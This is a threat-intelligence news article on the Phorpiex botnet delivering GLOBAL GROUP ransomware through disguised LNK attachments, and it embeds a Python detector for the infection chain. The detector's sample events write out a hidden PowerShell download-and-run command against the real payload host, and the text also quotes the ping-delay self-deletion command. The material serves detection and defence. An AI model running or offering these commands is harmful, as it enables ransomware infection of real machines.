Phorpiex Botnet Resurfaces With GLOBAL GROUP Ransomware via Weaponized LNK Files


A Silent Phishing Campaign Turning One Click Into Ransomware

A large-scale phishing campaign linked to the long-running Phorpiex botnet is quietly flooding inboxes across the globe. Disguised as harmless business documents, these emails rely on a deceptively simple trick: a fake Microsoft Word attachment that is not a document at all. Instead, it is a weaponized Windows shortcut file designed to silently unleash ransomware with almost no visible warning to the victim.

The “Your Document” Lure Explained

The phishing emails typically arrive with a generic subject line such as “Your Document,” a tactic meant to blend into everyday workplace communication. Attached is a file named something like “Document.doc.lnk,” crafted to look routine and unthreatening. For many users, the deception works instantly, because Windows hides known file extensions by default, masking the true nature of the attachment.

Why LNK Files Still Work So Well

Windows shortcut files (.lnk) remain a favorite tool for attackers because they require no exploits and raise few alarms. Cybercriminals often rename them using double extensions so that “.lnk” remains invisible. To strengthen the illusion, the attackers borrow legitimate icons from system libraries such as shell32.dll, making the file visually indistinguishable from a real Word document.

Living Off the Land to Evade Detection

Once opened, the shortcut does not launch a document or installer. Instead, it quietly triggers built-in Windows utilities such as cmd.exe and PowerShell. This technique, known as “Living off the Land” (LotL), allows attackers to abuse trusted system tools rather than introduce obvious malicious binaries, significantly reducing the chance of antivirus detection.

A Recycled Attack Chain With Modern Impact

Analysis shows that this LNK-based infection chain has been in circulation since at least May 2024, indicating that attackers are recycling proven tools rather than reinventing their methods. Despite its age, the approach remains highly effective, particularly against organizations with limited endpoint visibility.

Step-by-Step Breakdown of the Infection

After the user clicks the fake document, cmd.exe launches silently with hidden parameters. It then invokes PowerShell to download a payload from the remote IP address 178.16.54.109. The downloaded file, named spl.exe, is saved as windrv.exe in the user’s profile directory, intentionally mimicking a legitimate Windows driver.

Execution Without User Awareness

PowerShell executes the payload using Start-Process, all without producing pop-ups or warnings. From the user’s perspective, nothing unusual appears to happen. In reality, the system is already compromised and preparing for ransomware deployment.

Phorpiex: A Veteran Botnet With New Payloads

Phorpiex is far from new. Active since 2010, this botnet has been responsible for numerous malware campaigns over the years. In its current role, it functions as a delivery mechanism for GLOBAL GROUP ransomware, operating under a Ransomware-as-a-Service (RaaS) model.

Introducing GLOBAL GROUP Ransomware

GLOBAL GROUP is a relatively new ransomware strain belonging to the Mamona family. What sets it apart is its emphasis on silence. Unlike many ransomware variants, it avoids communicating with command-and-control servers during encryption, allowing it to bypass network-based monitoring tools.

Offline Encryption as a Stealth Advantage

Instead of retrieving keys from a remote server, GLOBAL GROUP generates encryption keys locally on the infected machine. This offline approach eliminates suspicious outbound traffic and reduces the likelihood of early detection by intrusion detection systems.

Self-Deletion to Erase Evidence

Once executed, the ransomware delays its actions using a simple ping command: ping 127.0.0.7 -n 3 && del /f /q windrv.exe. This brief pause allows encryption to begin before the original payload deletes itself, removing a critical artifact for investigators.
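The chain described above (cmd.exe spawning PowerShell to fetch and Start-Process the payload, then the ping-delayed self-deletion) can be matched in process-creation telemetry. The following detector is an added illustration, not code from the article or from any vendor; the `ProcEvent` shape, the document-extension list, the download-verb pattern and the sample events are all constructed assumptions.

```python
import re
from dataclasses import dataclass

# Document extensions a ".lnk" is likely to hide behind (assumed list, extend as needed)
DOC_EXTS = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".ppt", ".pptx", ".rtf")
# Download host named in the article; the behaviour rules below do not depend on it
KNOWN_DOWNLOAD_HOST = "178.16.54.109"
DOWNLOAD_VERBS = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|start-bitstransfer|\bcurl\b", re.I)
PING_DELAY_DEL = re.compile(r"ping\s+127\.0\.0\.\d+\s+-n\s+\d+\s*&&\s*del\s+/f\s+/q", re.I)

def is_disguised_lnk(filename: str) -> bool:
    """True for names like 'Document.doc.lnk': a shortcut wearing a document extension."""
    name = filename.lower()
    return name.endswith(".lnk") and name[:-4].endswith(DOC_EXTS)

@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style, assumed field names)."""
    parent_image: str
    image: str
    command_line: str

def classify(ev: ProcEvent) -> list[str]:
    """Return the chain stages this event matches; an empty list means nothing suspicious."""
    hits = []
    parent, img, cmd = ev.parent_image.lower(), ev.image.lower(), ev.command_line.lower()
    # Stage 1: the LNK's cmd.exe spawns PowerShell that fetches a payload and runs it via Start-Process
    if parent.endswith("cmd.exe") and img.endswith("powershell.exe"):
        if DOWNLOAD_VERBS.search(cmd) and "start-process" in cmd:
            hits.append("cmd->powershell download-and-execute")
        if KNOWN_DOWNLOAD_HOST in cmd or "windrv.exe" in cmd:
            hits.append("known campaign indicator in command line")
    # Stage 2: the dropped payload delays with a loopback ping, then deletes itself
    if img.endswith("cmd.exe") and PING_DELAY_DEL.search(cmd):
        hits.append("ping-delay self-deletion")
    return hits

# Constructed sample events modelled on the chain described above (not real telemetry)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -c Invoke-WebRequest http://178.16.54.109/spl.exe -OutFile "
              r"$env:USERPROFILE\windrv.exe; Start-Process $env:USERPROFILE\windrv.exe"),
    ProcEvent(r"C:\Users\alice\windrv.exe", r"C:\Windows\System32\cmd.exe",
              "cmd /c ping 127.0.0.7 -n 3 && del /f /q windrv.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -c Get-Process"),
]
```

Running `classify` over `SAMPLE_EVENTS` flags the first two events and leaves the benign PowerShell launch alone; `is_disguised_lnk` covers the attachment-name check from the mail gateway side.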

Anti-Analysis and Anti-Forensics Measures

GLOBAL GROUP actively looks for signs of virtual machines, sandboxes, and debugging tools. If detected, it terminates itself. It also shuts down database and backup-related processes to ensure files are unlocked and fully encryptable.

Persistence Through Legitimate-Looking Components

To maintain persistence, the malware copies itself to Windows\Temp


References:

Reported By: cyberpress.org